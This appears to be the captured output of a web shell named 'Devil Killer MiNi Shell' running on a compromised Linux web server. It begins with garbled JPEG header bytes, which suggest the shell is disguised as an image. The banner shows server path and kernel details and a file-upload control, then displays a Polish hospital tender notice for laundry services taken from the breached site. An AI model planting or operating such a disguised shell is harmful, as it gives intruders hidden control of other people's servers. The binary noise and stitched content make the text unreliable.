JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160208/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160208/13073-N-2016.html

<p class="kh_header"><b>Świecie: KOMPLEKSOWA USŁUGA SPECJALISTYCZNEGO PRANIA ODZIEŻY I BIELIZNY SZPITALNEJ</b><br>
<b>Numer ogłoszenia: 13073 - 2016; data zamieszczenia: 08.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital dla Nerwowo i Psychicznie Chorych im. dr J. Bednarza , ul. Sądowa 18, 86-100 Świecie, woj. kujawsko-pomorskie, tel. 052 33 08 305, faks 52 33 24 541.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-psychiatryczny.swiecie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KOMPLEKSOWA USŁUGA SPECJALISTYCZNEGO PRANIA ODZIEŻY I BIELIZNY SZPITALNEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest kompleksowa usługa specjalistycznego prania:
1) pościeli płaskiej;
2) odzieży fasonowej;
3) odzieży roboczej zimowej i letniej : (spodnie i bluza zimowe i letnie, koszula flanelowa, t-shirt, fartuchy robocze, kamizelki ocieplane, bluzy polarowe, kurtki zimowe, ręczniki frotte)
4) firan, zasłon, obrusów;
5) koców;
6) kołder;
7) poduszek;
8) bielizny osobistej;
9) próbek przetargowych;
10)mopów.
2. Wykonawca wykonuje usługę prania z częstotliwością 48 godzin w dni robocze a 72 godziny w przypadku dni wolnych i świąt.
3. Wykonawca zapewni realizację usługi cito w 24 godziny.
4. Świadczenie usług pralniczych powinno odbywać się zgodnie z ustawą z dnia 5 grudnia 2008 r. o zapobieganiu i zwalczaniu zakażeń i chorób zakaźnych u ludzi w ilości całkowitej średnio około 6833,33 kg miesięcznie, codziennie z wyłączeniem dni uznanych za wolne (soboty, niedziele i święta). Szacunkowa ilość prania w okresie 12 miesięcy wynosi 82000 kg. Ilości podane są orientacyjnie i mogą ulec zmianie.
5. W zakres kompleksowych usług pralniczych wchodzi:
1) odbiór brudnej i dostawa czystej bielizny i odzieży szpitalnej zgodnie z wymaganiami przepisów sanitarno-higienicznych tj.:
a) odbiór brudnej i dostawa czystej bielizny oraz odzieży pracowniczej odbywać się będzie na terenie Szpitala przy ul. Sądowej 18 w Świeciu w pomieszczeniach wskazanych przez Zamawiającego  codziennie  z wyłączeniem dni uznanych za wolne (soboty, niedziele i święta) w stałych godzinach od 700 do 900,
b) przekazanie brudnej bielizny i odbiór czystej każdorazowo musi być potwierdzone pisemnie przez upoważnionego pracownika szpitala i przedstawiciela Wykonawcy na dowodzie/druku/ zawierającym specyfikację asortymentowo - ilościową,
c) zwrócona, czysta bielizna powinna być szczelnie zapakowana w worki foliowe odrębnie dla każdej komórki organizacyjnej, a w czasie transportu w dodatkowy worek tak, aby zabezpieczyć bieliznę przed powtórnym zabrudzeniem,
d) bielizna wracająca powinna być złożona lewą stroną do wierzchu,
e) fartuchy i mundurki szpitalne powinny być prasowane i dostarczane w stanie wiszącym i zafoliowane,
f) przyjęta przez Wykonawcę do prania partia bielizny i odzieży winna być zwrócona w całości przy kolejnym zwrocie bielizny Szpitalnej,
g) transport musi odbywać się środkami transportu dostosowanymi do przewozu bielizny ogólnoszpitalnej brudnej i czystej z zachowaniem obowiązujących przepisów,
h) czynności załadunkowe i rozładunkowe przeprowadzane będą przez pracownika Wykonawcy i będą wliczone w cenę usługi;
2) dokładne sortowanie i pakowanie bielizny i odzieży po praniu według uzgodnionych asortymentów do worków odrębnie dla każdej komórki organizacyjnej szpitala;
3) bieżącą reperacje bielizny i odzieży obejmującą:
a) przyszywanie guzików, kieszeni,
b) zaszywanie części rozprutych,
c) inne drobne reperacje i naprawy uszkodzeń powstałych w czasie prania;
4) pranie wodne bielizny i odzieży suchej oraz mokrej wraz z:
a) odplamianiem,
b) dezynfekcją, dezynfekcją bielizny skażonej, odwszawianie,
c) wybielaniem poszarzałego asortymentu,
d) suszeniem,
e) maglowaniem lub prasowaniem,
f) zastosowaniem środków zmiękczających i antystatycznych do ostatniego prania koców,
g) krochmaleniem i prasowaniem fartuchów lekarskich, mundurków pielęgniarskich, serwet bawełnianych i lnianych oraz firanek okiennych,
h) segregowanie z jednoczesnym wyłączeniem sztuk podlegających kasacji.
6. Wykonawca wtoku realizacji usługi prania zapewni:
-  dezynfekcję rzeczy wymienionych w pkt. 3.1., przekazanych w czerwonych workach (skażone);
- fizyczną barierę higieniczną strefy brudnej i czystej pralni zapewniająca rozdział stanowisk i operacji technologicznych dla bielizny brudnej i czystej;
- proces prania prowadzony w pralnicach tunelowych i przelotowych pralnico-wirówkach;
- pranie bielizny zakaźnej w wydzielonych pralnicach;
- technologie prania dostosowane do rodzaju asortymentu, składu surowcowego i stopnia zabrudzenia bielizny;
- automatyczne dozowanie środków piorących i dezynfekujących; spektrum działania biobójczego środków dezynfekujących obejmuje: bakterie (również przetrwalnikujące m.in. Clostridrium difficile), prątki Tbc, grzyby i wirusy;
- monitorowanie parametrów procesu;
- zwalidowany proces prania i dezynfekcji gwarantujący powtarzalną skuteczność;
- suszenie bielizny w suszarko-roztrząsarkach z systemem filtrów umożliwiające równoczesne odpylanie tkanin;
- maglowanie bielizny płaskiej (pościelowej, stołowej) przy wykorzystaniu zautomatyzowanych linii maglujących (automatyczne wprowadzanie, składanie, sztaplowanie);
- prasowanie bielizny małoformatowej i fasonowej przy wykorzystaniu prasownic obrotowych i manekinowych;
- czyszczenie chemiczne z zastosowaniem środków bezhalogenowych;
- przegląd i drobne naprawy krawieckie;
- zabezpieczenie bielizny czystej w opakowaniach foliowych (worki bezbarwne);
- transport bielizny w wózkach transportowych zabezpieczonych pokrowcem;
- transport bielizny fasonowej na wieszakach jezdnych;
- środki transportu posiadające kontenery komorowe;
- aktualne raporty walidacji procesu dezynfekcji i prania.
7. Wykonawca zobowiązany jest na 2 dni przed dniem rozpoczęcia usługi wyposażyć Wojewódzki Szpital dla Nerwowo i Psychicznie Chorych w Świeciu w worki do bezpiecznego transportu bielizny. Worki powinny być oznakowane w sposób widoczny. Wykonawca ma również obowiązek dostarczyć do Zamawiającego 1 raz w miesiącu worki foliowe:(32 rolki worków różowych lub czerwonych po min 10 szt w rolce o pojemności 120 l i 100 worków bezbarwnych o pojemności 120 l) oraz bloczki z naszym asortymentem ( samokopiujące się - 1 oryginał i 2 kopie w każdym bloczku. Każdy bloczek ma wystarczyć na min 25 dni) Ponad to Wykonawca ma obowiązek dostarczyć do Zamawiającego min 3 metalowe wózki do przewozu prania i przekazać je Zamawiającemu w użytkowanie na czas trwania umowy(wózki będą rotowane w trakcie trwania usługi)
8. Wykonawca we własnym zakresie zabezpiecza transport brudnej oraz czystej bielizny, spełniający wszystkie wymagania higieniczne.
9. Transport posortowanej bielizny czystej winien odbywać się w workach oznakowanych, zgodnie z wydaną specyfikacją przesyłową dla każdej komórki organizacyjnej szpitala.
10. Odzież fasonowa czysta winna być transportowana na wieszakach (max po 5 szt).
11. Wykonawca ponosi pełną odpowiedzialność za powierzoną bieliznę Zamawiającego od momentu odebrania jej z magazynu bielizny brudnej, do czasu przekazania czystej bielizny bezpośrednio Zamawiającemu, którą bieliznę przekazał do pralni.
12. Różnice ilościowe i jakościowe strony będą wyjaśniać  na bieżąco.
13. W przypadku zwrotu Zamawiającemu bielizny lub odzieży w ilości mniejszej niż przekazana do prania lub zwrotu partii zawierającej uszkodzoną bieliznę lub odzież, Zamawiającemu przysługuje prawo reklamacji. Fakt ten zostanie odnotowany  w protokole reklamacji. 
14. W przypadku reklamacji jakościowej prania, wynikającej z winy Wykonawcy, zobowiązany jest on do prawidłowego wykonania usługi prania asortymentu zareklamowanego w czasie do 48 godzin w dni robocze oraz 72 godzin w weekendy od odebrania reklamowanego towaru.
15. W przypadku reklamacji ilościowych prania, wynikających z winy Wykonawcy, zobowiązany jest on do zapłaty za utracony przedmiot lub kupno nowego tego samego typu w terminie 14 dni od daty zgłoszenia reklamacji. W przypadku braku realizacji w terminie 14 dni zapłaty lub kupna nowego towaru przez Wykonawcę, Zamawiający dokona zakupu nowego towaru na koszt Wykonawcy.
16. Pranie winno być wykonywane przy zachowaniu technologii właściwej dla prania bielizny szpitalnej w celu uzyskania odpowiedniego efektu czystości, dezynfekcji, estetyki i trwałości bielizny.
17. Środki piorące i dezynfekcyjne używane do wykonania zamówienia:
1) muszą posiadać atest PZH, 
2) być ujęte w wykazie PZH Preparaty dezynfekujące do stosowania w zakładach opieki zdrowotnej.
18. Dla preparatów biobójczych wymagane jest dodatkowo potwierdzenie zgłoszenia do rejestracji w Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych lub dokument potwierdzający zarejestrowanie preparatu.
19. Opis wymaganego sposobu wykonywania przez Wykonawcę usług pralniczych:
1) usługi wykonywane będą w pomieszczeniach oraz przy użyciu maszyn i środków piorących Wykonawcy,
2) pralnia w której wykonywane będzie zamówienie winna posiadać barierę higieniczną,
3) środki biobójcze powinny cechować się właściwościami piorąco-dezynfekcyjnymi o szerokim spektrum działania w warunkach:
a) temperatura minimum 60 0 C (w zależności od rodzaju bielizny),
b) czas prania minimum 20 minut.
20. Zamawiający zastrzega sobie prawo do: 
1) kontroli w każdym czasie procesu prania oraz prawidłowości funkcjonowania pralni zgodnie z umową, w tym kontroli dokumentów zakupu środków piorących i dezynfekcyjnych,
2) kontroli dokumentacji procesów prania,
3) wglądu do protokołu kontroli przeprowadzonych przez nadzór sanitarno-epidemiologiczny,
4) wglądu do aktualnych kart charakterystyki środków piorących i dezynfekcyjnych.
21. W celu potwierdzenia jakości wykonanej usługi pralniczej pod względem czystości mikrobiologicznej, Wykonawca przedstawi kopie badań mikrobiologicznych czystości bielizny z miejsca wykonania usługi przeprowadzanych nie rzadziej niż 1 raz na kwartał.
22. Za wykonanie usług zgodnie z wymaganiami Wykonawca będzie ponosił odpowiedzialność przed Zamawiającym oraz przed uprawnionymi organami kontroli zewnętrznej.
23. Zapłata należności za dostarczony towar następować będzie przelewem po dostarczeniu i przyjęciu towaru oraz wystawieniu i doręczeniu faktury w terminie 30 dni. Za odpowiednie wydłużenie tego terminu Zamawiający przyzna ofercie dodatkowe punkty: 2 pkt za 45 dni, 3 pkt za 60 dni. 
24.Strony dopuszczają możliwość ograniczenia lub zwiększenia wartości brutto umowy do 10% (plus - minus). O zmianie jednostronnie decyduje ZAMAWIAJĄCY. Z tego tytułu nie będą przysługiwały WYKONAWCY żadne roszczenia z wyjątkiem zapłaty ceny za wykonaną usługę..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości 4100  zł (słownie złotych: cztery tysiące sto).
Szczegóły w SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania działalności związanej z przedmiotem zamówienia, jeżeli złoży oświadczenie zgodnie z art. 22 ust.1 ustawy Pzp oraz wykaże się posiadaniem:
1) aktualnej pozytywnej opinii właściwego organu sanitarno-epidemiologicznego o spełnianiu warunków sanitarno-higienicznych zgodnie z obowiązującymi przepisami przy praniu odzieży i bielizny ogólnoszpitalnej;
2) aktualnej pozytywnej opinii właściwego organu sanitarno-epidemiologicznego o braku sprzeciwu na świadczenie usług transportowych dotyczących przewozu bielizny szpitalnej z zachowaniem wymaganej bariery higienicznej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli:
1) wykaże należyte wykonanie 2 usług specjalistycznego prania odzieży i bielizny szpitalnej w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, o wartości minimum 200 tys. zł brutto;
2) posiada wdrożony System Zarządzania ISO 9001:2008;
3) posiada wdrożony System Kontroli Skażenia Biologicznego PN-EN 14065:2005;
4) posiada wdrożony System Zarządzania Środowiskiem PN-EN ISO 14001.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia, jeżeli złoży oświadczenie zgodnie z  art. 22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli złoży oświadczenie zgodnie z  art. 22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek sytuacji ekonomicznej i finansowej, jeżeli wykaże się posiadaniem polisy ubezpieczeniowej lub innym dokumentem potwierdzającym, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 100 tys. zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane usługi odpowiadają stawianym wymaganiom, Zamawiający wymaga, aby Wykonawca dołączył do Oferty:
1) opisy stosowanych procesów - technologie prania;
2) karty charakterystyk oraz deklaracje CE środków dezynfekujących, piorących i wybielajacych, które będą używane w procesie wykonywania usługi; 
3) dokumenty potwierdzające aktualny wpis (rejestracja) do Rejestru Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych środków, które będą używane w procesie wykonywania usługi i które podlegają takiemu wpisowi - zakres działania dezynfekcyjnego (B, Tbc, V, F ) musi być potwierdzony pozytywną opinią zakładu, którego metodyka badań skuteczności produktów biobójczych i substancji czynnych jest zaakceptowana przez  Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych;
4) atest folii stosowanej do pakowania bielizny;
5) dokument z badania czystości powietrza z ostatnich 12 miesięcy z akredytowanego laboratorium;
6) dokument z badania czystości mikrobiologicznej bielizny z ostatnich 3 miesięcy z akredytowanego laboratorium.

Wykonawca złoży ofertę wraz z pełnomocnictwem (ciągiem pełnomocnictw) do podpisania oferty (jeżeli dotyczy), o ile nie wynika ono z przepisów lub innych dokumentów załączonych do oferty (np. odpisu z rejestru sądowego). Pełnomocnictwo winno być dołączone  w formie oryginału lub kopii poświadczonej przez notariusza. 

W sytuacji, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, na zasadach określonych w art. 26 ust. 2b ustawy, Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Wzór zobowiązania stanowi załącznik nr 8 do SIWZ.
Pisemna informacja dotycząca potencjału podmiotu trzeciego, na który powołuje się Wykonawca, pozwalająca na dokonanie oceny czy stosunek łączący Wykonawcę z tym podmiotem gwarantuje rzeczywisty dostęp do jego zasobów. Zamawiający wymaga, aby informacja zawierała w szczególności:
1) zakres dostępnych wykonawcy zasobów innego podmiotu,
